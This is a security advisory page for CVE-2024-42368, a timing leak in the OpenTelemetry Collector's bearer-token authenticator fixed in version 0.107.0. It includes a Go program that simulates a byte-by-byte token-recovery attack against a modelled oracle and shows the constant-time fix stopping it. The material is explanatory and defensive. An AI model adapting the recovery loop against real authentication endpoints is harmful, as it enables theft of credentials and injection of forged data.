Vulnerability Description
OpenTelemetry, also known as OTel, is a vendor-neutral open source observability framework for instrumenting, generating, collecting, and exporting telemetry data such as traces, metrics, and logs. The `bearertokenauth` extension's server authenticator performed a plain, non-constant-time string comparison of the received and configured bearer tokens. This affects anyone using the `bearertokenauth` server authenticator on a collector. A malicious client with network access to the collector can mount a timing attack against this authenticator to recover the configured token: because the comparison returns as soon as the first mismatching byte is found, the response time grows with the length of the correct prefix in the guess, so the attacker can iteratively send candidate tokens, measure response times, and fix one byte at a time. With the recovered token the attacker can introduce fabricated or bad data into the collector's telemetry pipeline. The observable timing vulnerability was fixed by switching to a constant-time comparison in opentelemetry-collector-contrib 0.107.0.
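The following Go program is an added example written for this page; it is not the extension's code and does not reproduce the patched or unpatched `bearertokenauth` source. It models the server's comparison as an oracle whose `cost` return stands in for the response time an attacker would measure (the number of bytes examined before the server replied), then drives that oracle the way the described attack does: find the token length, then for each position keep the byte whose attempt cost the most. Against the early-exit comparison the attacker recovers the whole token in a few hundred queries; against the `crypto/subtle.ConstantTimeCompare` version every byte costs the same and the attack stalls at the first position. `demoToken`, the alphabet, the cost model and the `checkBearer` helper are all constructed for the example.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"strings"
)

// demoToken is constructed for this example; it is not a real deployment's token.
const demoToken = "s3cr3t-otel-tok3n"

// oracle models one authentication attempt against the collector. ok reports
// whether the token was accepted; cost stands in for the response time the
// attacker measures (how many bytes were examined before the server replied).
type oracle func(candidate string) (ok bool, cost int)

// vulnerableOracle stops at the first mismatching byte, like a plain string
// comparison, so the cost grows with the length of the correct prefix.
func vulnerableOracle(configured string) oracle {
	return func(candidate string) (bool, int) {
		if len(candidate) != len(configured) {
			return false, 0
		}
		for i := 0; i < len(candidate); i++ {
			if candidate[i] != configured[i] {
				return false, i + 1
			}
		}
		return true, len(candidate)
	}
}

// fixedOracle uses subtle.ConstantTimeCompare, which examines every byte of
// equal-length inputs, so the cost depends only on the length (which is
// still leaked, since ConstantTimeCompare returns 0 at once for mismatched
// lengths), never on the content of the guess.
func fixedOracle(configured string) oracle {
	return func(candidate string) (bool, int) {
		if len(candidate) != len(configured) {
			return false, 0
		}
		ok := subtle.ConstantTimeCompare([]byte(candidate), []byte(configured)) == 1
		return ok, len(configured)
	}
}

// checkBearer is the shape of a hardened server-side check (illustrative,
// not the extension's code): strip the scheme, then compare in constant time.
func checkBearer(authorization, configured string) bool {
	const scheme = "Bearer "
	if !strings.HasPrefix(authorization, scheme) {
		return false
	}
	token := strings.TrimPrefix(authorization, scheme)
	return subtle.ConstantTimeCompare([]byte(token), []byte(configured)) == 1
}

// recoverToken drives the oracle the way a timing attacker would. It returns
// ok=false as soon as no byte stands out at some position, which is exactly
// what happens against the constant-time oracle. queries counts attempts.
func recoverToken(o oracle, alphabet string, maxLen int) (token string, ok bool, queries int) {
	query := func(c string) (bool, int) {
		queries++
		return o(c)
	}
	// Step 1: the only length that costs more than 0 is the configured one.
	n := 0
	for l := 1; l <= maxLen && n == 0; l++ {
		if _, cost := query(strings.Repeat("\x00", l)); cost > 0 {
			n = l
		}
	}
	if n == 0 {
		return "", false, queries
	}
	// Step 2: NUL is outside the alphabet, so unfixed positions never match.
	guess := []byte(strings.Repeat("\x00", n))
	for pos := 0; pos < n; pos++ {
		bestByte, minCost, maxCost := byte(0), -1, -1
		for i := 0; i < len(alphabet); i++ {
			guess[pos] = alphabet[i]
			accepted, cost := query(string(guess))
			if accepted {
				return string(guess), true, queries
			}
			if minCost < 0 || cost < minCost {
				minCost = cost
			}
			if cost > maxCost {
				maxCost, bestByte = cost, alphabet[i]
			}
		}
		if maxCost == minCost {
			return "", false, queries // every byte cost the same: nothing leaked
		}
		guess[pos] = bestByte
	}
	return "", false, queries
}

func main() {
	alphabet := "abcdefghijklmnopqrstuvwxyz0123456789-"
	tok, ok, q := recoverToken(vulnerableOracle(demoToken), alphabet, 32)
	fmt.Printf("early-exit compare: recovered=%q ok=%v queries=%d\n", tok, ok, q)
	tok, ok, q = recoverToken(fixedOracle(demoToken), alphabet, 32)
	fmt.Printf("constant-time compare: recovered=%q ok=%v queries=%d\n", tok, ok, q)
}
```

The cost model is deliberately noise-free so the program is deterministic; a real attacker has to average many requests per candidate to see a single byte comparison through network jitter, but the per-byte leak is the same. Note that `ConstantTimeCompare` still reveals whether the lengths match, which is why the length-finding step succeeds against both oracles; only the content of the token is protected.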
CVSS Score
6.5 (MEDIUM)
Related Weaknesses (CWE)
References
- https://github.com/open-telemetry/opentelemetry-collector-contrib/commit/c9bd3ef
- https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34516
- https://github.com/open-telemetry/opentelemetry-collector-contrib/security/advis
FAQ
What is CVE-2024-42368?
CVE-2024-42368 is a vulnerability with a CVSS score of 6.5 (MEDIUM). OpenTelemetry, also known as OTel, is a vendor-neutral open source Observability framework for instrumenting, generating, collecting, and exporting telemetry data such as traces, metrics, and logs. Th...
How severe is CVE-2024-42368?
CVE-2024-42368 has been rated MEDIUM with a CVSS base score of 6.5/10. The attack requires network access to the collector's receiver and yields the configured bearer token; the resulting impact is on the integrity of the telemetry pipeline (fabricated or bad data injected by the attacker), not on the confidentiality of telemetry already collected.
Is there a patch for CVE-2024-42368?
Yes. The fix replaces the plain string comparison with a constant-time comparison and shipped in opentelemetry-collector-contrib 0.107.0; see the commit and pull request in the references above. Collectors using the `bearertokenauth` server authenticator should upgrade to 0.107.0 or later, and the configured token should be rotated if the collector was reachable by untrusted clients while the vulnerable version was deployed.